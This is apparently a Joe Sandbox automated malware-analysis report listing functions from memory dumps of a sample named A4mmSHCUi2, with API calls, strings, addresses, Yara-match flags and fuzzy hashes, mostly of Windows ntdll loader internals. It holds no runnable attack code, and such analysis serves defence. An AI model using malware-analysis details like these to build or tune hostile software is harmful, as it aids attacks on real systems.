Instruction ID: d7fe87413c33a1177cac9a70182c7f57153b7bff68e27ff951a537264ab88f37
Opcode Fuzzy Hash: 37ba5d7e00963ee29478001925815239fe06a52e6f04859efb8c0eb31d3af51f
Instruction Fuzzy Hash: BB90027160188882D1117158840574A000597D0701F59C411A442469CDC695C9D17221

Function 01BF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01BF35CA

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8c1700f36518a2130b842a9c7468234358731bdaed8a10f5ba36f26165b1b4f
Instruction ID: be248990c2e4d361e64a1dbd81ddf047cfb0d178fcc0a6a691646b455d3a3583
Opcode Fuzzy Hash: a8c1700f36518a2130b842a9c7468234358731bdaed8a10f5ba36f26165b1b4f
Instruction Fuzzy Hash: 1B900271A0590482D10171584515706100597D0601F65C411A04245ACDC795CA9166A2

Function 00413EE5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(030c0fG,00000111,00000000,00000000), ref: 00413F6A

Strings

030c0fG, xrefs: 00413F5F, 00413F69, 00413F7A
030c0fG, xrefs: 00413F71, 00413F74

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 030c0fG$030c0fG
API String ID: 1836367815-4200685695
Opcode ID: 1af3a87c7c853454d1a0c50a384c9442cd26affaada534bd761425eb06dd7255
Instruction ID: aeb0b03d16fd5cc4d46ac931026d53ab9e48c94f07c3b082305741344c7818e1
Opcode Fuzzy Hash: 1af3a87c7c853454d1a0c50a384c9442cd26affaada534bd761425eb06dd7255
Instruction Fuzzy Hash: 3411E972D4121C7ADB109AE58C81DEF7B7CDF45294F458069FA04A7240D67C4E0687A5

Function 00413EF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(030c0fG,00000111,00000000,00000000), ref: 00413F6A

Strings

030c0fG, xrefs: 00413F5F, 00413F69, 00413F7A
030c0fG, xrefs: 00413F71, 00413F74

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 030c0fG$030c0fG
API String ID: 1836367815-4200685695
Opcode ID: ab9d7c91d07ced1c1e8d3fcffb4c26ebe7125c8d19e4949d27709a9e380f07a7
Instruction ID: e085248bcca0db3be03a7f460c598c938006aab9bf7a7fbb3a4c0a223e898e38
Opcode Fuzzy Hash: ab9d7c91d07ced1c1e8d3fcffb4c26ebe7125c8d19e4949d27709a9e380f07a7
Instruction Fuzzy Hash: 2D01D6B2D0121C7ADB10AAE68C82DEF7B7CDF44798F458069FA0467241D67C5E068BE5

Function 0042C7D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,D2E1F010,00000007,00000000,00000004,00000000,00416F0D,000000F4), ref: 0042C80F

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c1a5b28e4eb003a82da69d2b12b4df73ea048d6ad08ab51127f596ae75f218b3
Instruction ID: 80baa1367f76162829c4e48f0107b5d98deda59c10dd61a74ea329d6bd0b1173
Opcode Fuzzy Hash: c1a5b28e4eb003a82da69d2b12b4df73ea048d6ad08ab51127f596ae75f218b3
Instruction Fuzzy Hash: 71E06DB16442047BD624EE59DC42F9B33ACEFC9754F004019F918A7241D671B91087B9

Function 0042C783 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E3DE,?,?,00000000,?,0041E3DE,?,?,?), ref: 0042C7C2

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2b463ec047cfe20eafb14ee59cb52557d9eea763486a997a2007afd140000a1e
Instruction ID: 4917b59c8fd54ad852980644d6c7735a21c547274749b6ceeabe45948c624698
Opcode Fuzzy Hash: 2b463ec047cfe20eafb14ee59cb52557d9eea763486a997a2007afd140000a1e
Instruction Fuzzy Hash: 34E06DB1204204BBD610EE99DC41F9B37ACEFC9714F004019F928A7242C671B92086B8

Function 0042C823 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,13FAA2FA,?,?,13FAA2FA), ref: 0042C85A

Memory Dump Source

Source File: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A4mmSHCUi2.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 36c6c65f54994e60e8ba2d7b1aa3a8183bc48dfec432a1f06cf53ef7dcafcf50
Instruction ID: 9522eeaed9f96fe449eb7a194c8791d26d029026feee58cc528499a2bdec6e4d
Opcode Fuzzy Hash: 36c6c65f54994e60e8ba2d7b1aa3a8183bc48dfec432a1f06cf53ef7dcafcf50
Instruction Fuzzy Hash: A5E086712402147BD620EA5ADC41FDBB75CDFC5714F00405AFA0C6B142CAB0794187F5

Function 01BF2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01BF2C24

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39825263a298baa796ce9b3fca479813b1d2524b5e8fe1f4e4b313013aebc4a4
Instruction ID: 4bbff700abcb815a5ae531ea79227d651795bfc41c46f599283de198705b2f86
Opcode Fuzzy Hash: 39825263a298baa796ce9b3fca479813b1d2524b5e8fe1f4e4b313013aebc4a4
Instruction Fuzzy Hash: F5B09B71D019C5C5DA16E76446097177900F7D0701F15C0A5D3030685F8738C1D5E275

Non-executed Functions

Function 01C32349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

CFGOptions, xrefs: 01C32967
@, xrefs: 01C32B74
UnloadEventTraceDepth, xrefs: 01C324C0
ExecuteOptions, xrefs: 01C325A0
MinimumStackCommitInBytes, xrefs: 01C32BB0
TracingFlags, xrefs: 01C32549
DisableHeapLookaside, xrefs: 01C3246D
ShutdownFlags, xrefs: 01C324A1
GlobalFlag2, xrefs: 01C32FC0
GlobalFlag, xrefs: 01C32F3F, 01C33059
UseImpersonatedDeviceMap, xrefs: 01C3251C
minkernel\ntdll\ldrinit.c, xrefs: 01C33187
MaxDeadActivationContexts, xrefs: 01C32D82
RaiseExceptionOnPossibleDeadlock, xrefs: 01C32579
MaxLoaderThreads, xrefs: 01C324EC
@, xrefs: 01C32942
DisableExceptionChainValidation, xrefs: 01C3275F
LdrpInitializeExecutionOptions, xrefs: 01C3317D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01C33176
FrontEndHeapDebugOptions, xrefs: 01C32489

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 53007c82b833ea48333ce0f6be5949707a26a0029310ec55256dae1c1412098e
Instruction ID: 48c8a8cfc476d125c2cbc4e7623909129b5b198b6b6cd8f0787ed6bbed822a78
Opcode Fuzzy Hash: 53007c82b833ea48333ce0f6be5949707a26a0029310ec55256dae1c1412098e
Instruction Fuzzy Hash: A4929D71608342EFEB25DE29C884B6BBBE8BB84754F04482DFA95D7250D770E944CB92

Function 01BE8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

undeleted critical section in freed memory, xrefs: 01C2542B
corrupted critical section, xrefs: 01C254C2
Thread identifier, xrefs: 01C2553A
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C2540A, 01C25496, 01C25519
double initialized or corrupted critical section, xrefs: 01C25508
Address of the debug info found in the active list., xrefs: 01C254AE, 01C254FA
Thread is in a state in which it cannot own a critical section, xrefs: 01C25543
Critical section address., xrefs: 01C25502
Invalid debug info address of this critical section, xrefs: 01C254B6
8, xrefs: 01C252E3
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C254E2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C254CE
Critical section debug info address, xrefs: 01C2541F, 01C2552E
Critical section address, xrefs: 01C25425, 01C254BC, 01C25534

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: d3a7ccd04901eff74ec250d52d8ba42fcdf8a98c766db5e4ff2341655f1715cc
Instruction ID: dedc120774acc53d98fae75fda2f59e1a293ee90aecef8c39602460cf2797161
Opcode Fuzzy Hash: d3a7ccd04901eff74ec250d52d8ba42fcdf8a98c766db5e4ff2341655f1715cc
Instruction Fuzzy Hash: F0817C71A00358EFDF24CF9AC845BEEBBB5AB09B14F1041A9F504BB250D371A941CB90

Function 01BE29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01C222E4
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01C22624
RtlpResolveAssemblyStorageMapEntry, xrefs: 01C2261F
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01C22506
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01C224C0
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01C22602
@, xrefs: 01C2259B
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01C225EB
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01C22412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01C22409
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01C22498

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 2255dddd7f4b7d9e63da1ca359da1a63492f1034eb2b4788654fecf15059ad70
Instruction ID: 141a908cb82dfe7ae61e45d8b72d83f694aa1d04c799aa120124f64e4b09bbee
Opcode Fuzzy Hash: 2255dddd7f4b7d9e63da1ca359da1a63492f1034eb2b4788654fecf15059ad70
Instruction Fuzzy Hash: 1D028DB1D00229DBDF35DB54CC84BAAB7B8AB54704F4041EAE609A7251EB30AF84CF59

Function 01C58B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

csrss.exe, xrefs: 01C58B80
smss.exe, xrefs: 01C58B8B
runtimebroker.exe, xrefs: 01C58B73
services.exe, xrefs: 01C58B96
svchost.exe, xrefs: 01C58B68
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01C58BD0
DefaultBrowser_NOPUBLISHERID, xrefs: 01C58D00
heapType, xrefs: 01C58BCB
lsass.exe, xrefs: 01C58BA1
SegmentHeap, xrefs: 01C58BE9

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 0a051c6b445e8914f93e6c1bc46887930d5ea253e3a4fdfd6ed7a53f721d9332
Instruction ID: 88f874892b604e8ba7a219bfd574f18fc4e00e823fd903a3100fc179636f6eb9
Opcode Fuzzy Hash: 0a051c6b445e8914f93e6c1bc46887930d5ea253e3a4fdfd6ed7a53f721d9332
Instruction Fuzzy Hash: CC51F271114302DBD729DF1AC844BABBBE8FF94644F14095DEE59C3241EB70D688C796

Function 01C60274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01C60399, 01C604A8, 01C605D0, 01C60675, 01C606CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01C606EA
About to reallocate block at %p to %Ix bytes, xrefs: 01C603BA
HEAP: , xrefs: 01C603A6, 01C604B5, 01C605DD, 01C60682, 01C606D9
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01C6069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01C604D3
RtlReAllocateHeap, xrefs: 01C602BF, 01C60362
Just reallocated block at %p to %Ix bytes, xrefs: 01C605F1

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 9c4444c20b1a0e8b1ef56f7d5ea013b60474e54400c483548d0eff3cd7187633
Instruction ID: 5851a807febb8a20699c1c6849d4600f3730e3e2f959f2dc147cfbfb3fbbb824
Opcode Fuzzy Hash: 9c4444c20b1a0e8b1ef56f7d5ea013b60474e54400c483548d0eff3cd7187633
Instruction Fuzzy Hash: 07D13331604285DFDB2ADF69C480AADBFF5FF59704F488099F446AB262C734DA91CB14

Function 01C389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDebug, xrefs: 01C38CA5
HandleTraces, xrefs: 01C38C8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01C38A3D
VerifierDlls, xrefs: 01C38CBD
AVRF: -*- final list of providers -*- , xrefs: 01C38B8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01C38A67
VerifierFlags, xrefs: 01C38C50

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 138c46f364f316b2623631bc6834f994a35c24b752ea08dd8231bd1ebe7116bb
Instruction ID: ed2b4d1be0de3673903f071fb4fd4039242c64a6adc48f0f1ea36b60a2a4d2dd
Opcode Fuzzy Hash: 138c46f364f316b2623631bc6834f994a35c24b752ea08dd8231bd1ebe7116bb
Instruction Fuzzy Hash: 5A9147B2645303EFDB26DF6C9881B5B77A4ABE4B18F444698FA41AB250C770DD01CB91

Function 01BBEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 01BBEB58
T, xrefs: 01BBEB4E
, xrefs: 01BBF299
{, xrefs: 01C14643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01BBEB6C
R, xrefs: 01BBEB62

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 1273fba00907bc1f33ee200e2cecc693550313efc3e7903613c1771ec237bfe3
Instruction ID: 0857c892aa101fbacfa96856fc96bc8fc5f9cac93ec41142ce9f8d0b2a0ccc9f
Opcode Fuzzy Hash: 1273fba00907bc1f33ee200e2cecc693550313efc3e7903613c1771ec237bfe3
Instruction Fuzzy Hash: B4A24774A0562ACFDB68CF19CC887E9BBB5EF46304F1442E9D909A7664DB709E81CF40

Function 01BE63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01C240D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01C241FE
Delaying execution failed with status 0x%08lx, xrefs: 01C24258
minkernel\ntdll\ldrinit.c, xrefs: 01C240E9, 01C2414B, 01C2420F, 01C24269
_LdrpInitialize, xrefs: 01C240DF, 01C24141, 01C24205, 01C2425F
Process initialization failed with status 0x%08lx, xrefs: 01C2413A

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 8ff73d182e3294d0144c40b944339be0297e8eddd7b88186cab0a48c7338fdac
Instruction ID: fdf64511e7924e7b73705c10e53b26cc60416dccfef27600db43f642376beeca
Opcode Fuzzy Hash: 8ff73d182e3294d0144c40b944339be0297e8eddd7b88186cab0a48c7338fdac
Instruction Fuzzy Hash: 6D915530F00326DBEB2EDF59D948BAA7BF1AF61B18F5441A8E901AB281D774D841C7D1

Function 01BA645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01C099ED
LdrpInitShimEngine, xrefs: 01C099F4, 01C09A07, 01C09A30
minkernel\ntdll\ldrinit.c, xrefs: 01C09A11, 01C09A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01C09A01
apphelp.dll, xrefs: 01BA6496
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01C09A2A

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 6cef5aba435dea9760d800f0dafda84c0382f53f2e6f3af15a23e349bad3295b
Instruction ID: 275161f9e3be5a16b3f27b541300c1b89a3d89006d7325e77640be337a51fda5
Opcode Fuzzy Hash: 6cef5aba435dea9760d800f0dafda84c0382f53f2e6f3af15a23e349bad3295b
Instruction Fuzzy Hash: 0E51F571608304DFDB2ADF24C842BAB7BE8FB94B48F44055DF68A971A1D730E944CB92

Function 01BEC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 01C281E5
LdrpInitializeImportRedirection, xrefs: 01C28177, 01C281EB
minkernel\ntdll\ldrredirect.c, xrefs: 01C28181, 01C281F5
minkernel\ntdll\ldrinit.c, xrefs: 01BEC6C3
Loading import redirection DLL: '%wZ', xrefs: 01C28170
LdrpInitializeProcess, xrefs: 01BEC6C4

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: df820d154b04694db6586307f41d86545b0e45d24454a192520dc741a2d3521f
Instruction ID: 85d676de815a57f7d4074c92d96024e44ffb80a705b09ea95e04361a525dbe22
Opcode Fuzzy Hash: df820d154b04694db6586307f41d86545b0e45d24454a192520dc741a2d3521f
Instruction Fuzzy Hash: F63127716443529FC728EF28D946E2BBBD4EF94B14F00059CF945AB291EB20EC05CBA2

Function 01BE2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01C221BF
RtlGetAssemblyStorageRoot, xrefs: 01C22160, 01C2219A, 01C221BA
SXS: %s() passed the empty activation context, xrefs: 01C22165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01C22178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01C22180
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01C2219F

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 98a3a8fa04f421d56ddf6cd2e2c69bbb1a5da9a2668c6da24055c547cf800b82
Instruction ID: 69d6191d508634ae134e8d147cea4aa2821b46ecc1ee2801a38ce45031031e22
Opcode Fuzzy Hash: 98a3a8fa04f421d56ddf6cd2e2c69bbb1a5da9a2668c6da24055c547cf800b82
Instruction Fuzzy Hash: F7310836F40225B7FB299A9ACC85F5B7BA8DB54A50F1500E9FA04AB150D770DE01CAA1

Function 01BF096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01BF2DF0: LdrInitializeThunk.NTDLL ref: 01BF2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BF0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BF0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BF0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BF0D74

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 510e0cda1a73e54494ec0c9380cf83e1fb1c816e5e2cd60b15615c06ebb1f0bd
Instruction ID: 04bc5c4b7e9be5036f83e7b331fe7cc6ba551045ade47806c8c53d105982856d
Opcode Fuzzy Hash: 510e0cda1a73e54494ec0c9380cf83e1fb1c816e5e2cd60b15615c06ebb1f0bd
Instruction Fuzzy Hash: 3E424A75900715DFDB25DF28C880BAAB7F5BF04314F1445ADEA899B252D770EA88CF60

Function 01BBA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 01BBA3F7
8, xrefs: 01BBA3E7
LdrResFallbackLangList Enter, xrefs: 01BBA3EF
LdrResFallbackLangList Exit, xrefs: 01BBA3FF

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: c0802d916d10fd07edf9ddef0075e5b2f4f0aff1cf946a93fb5853688e7c6265
Instruction ID: 4753935f686da21b32a714f8237fe1a91030105184dd47b1261bd9571055859a
Opcode Fuzzy Hash: c0802d916d10fd07edf9ddef0075e5b2f4f0aff1cf946a93fb5853688e7c6265
Instruction Fuzzy Hash: DCC1B174908386CFD719DF68C080BBAB7E4FF85704F0049A9F9958BA51E7B8CA45CB52

Function 01BE8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01BE855E
minkernel\ntdll\ldrinit.c, xrefs: 01BE8421
@, xrefs: 01BE8591
